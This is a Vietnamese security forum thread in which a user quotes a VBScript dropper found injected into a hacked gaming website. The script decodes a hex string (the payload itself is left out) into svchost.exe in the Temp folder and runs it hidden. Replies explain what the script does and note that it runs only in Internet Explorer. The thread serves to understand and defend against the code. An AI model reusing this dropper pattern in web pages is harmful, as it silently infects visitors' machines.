[ VBScript ] Virus dropFileName = "svchost.exe"

yingwu

Member
10/08/2017
1
5 bài viết
[ VBScript ] Virus dropFileName = "svchost.exe"
Nghe tên tiêu đề em nghĩ chắc mấy cao thủ cũng biết con Virus này rồi nhỉ , hehe . Tại em cũng có đọc mấy bài viết trước từ con Virus này nhưng có từ những năm 2011-2013.
Hôm qua em lướt Web thấy một trang về thể loại Game hồi trước em hay chơi . Em vào thì thấy nó ghi 'Website đang bị gián đoạn do bị tấn công' . Em có view-source thì thấy bên cuối mã nguồn thì có dòng này

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "Trong đây là đoạn code đc mã hóa rất dài"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

Em cũng gà mờ trong việc lập trình , nên có thể hiểu sơ sơ đoạn Code ( có khi còn hiểu sai ) , em nghĩ nó xóa File svchost.exe trên máy của mình và tạo ra một đoạn script gì đó để khai thác và ẩn trong file svchost.exe trên máy em và các mã độc đó được đặt trong biến WriteData thì phải ... Em vào trang Web này liệu đoạn mã này có thực thi đến file svchost.exe trên máy em không mọi người , tại em vào xem svchost.exe trong system32 thì thấy dung lượng nó chỉ 27kb

Em cũng có đọc mấy bài viết về con Virus này nhưng mà họ không có nói về tác hại của nó và cũng không nói rõ nếu Client truy cập vào trang Web có đoạn mã này thì liệu máy họ có bị dính Virus hay không.
Em cảm ơn mọi người trước , em cũng mới vào diễn đàn và hoạt động . Hi vọng được mọi người giúp đỡ ! Nếu có gì sai xót thì xin mọi người bỏ qua ^^
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: HustReMw
không có quyền to tới mức xoá được svchost đâu bạn ạ
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Nó không xóa file svchost.exe đâu em. Nó chỉ tạo file có tên giống thôi, thư mục khác kìa:DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName.

GetSpecialFolder: lấy về đường dẫn các thư mục kiểu như %temp%, %appdata%
không có quyền to tới mức xoá được svchost đâu bạn ạ
Cảm ơn 2 anh đã trả lời câu hỏi của em
Nó không xóa file svchost.exe đâu em. Nó chỉ tạo file có tên giống thôi, thư mục khác kìa:DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName.

GetSpecialFolder: lấy về đường dẫn các thư mục kiểu như %temp%, %appdata%
FSO.GetSpecialFolder(2) hình như là trả về TemporaryFolder . Em có tìm trong Folder này ( Temp ) mà không có file svchost.exe đó . Giờ không có biết nên xóa hết trong temp không anh nhỉ ? Tại nghe nhiều người cũng nói Folder này cũng có nhiều cái quan trọng . Hi vọng được anh giúp :D
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Cái VBScript này chỉ chạy trên IE thôi nhé em, em dùng chrome hoặc firefox thì không sao.
Dạ okay , cảm ơn anh ! Hèn chi giờ con Virus này cũng ít ai hỏi tới . Có mấy thằng như em mới hỏi :p
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên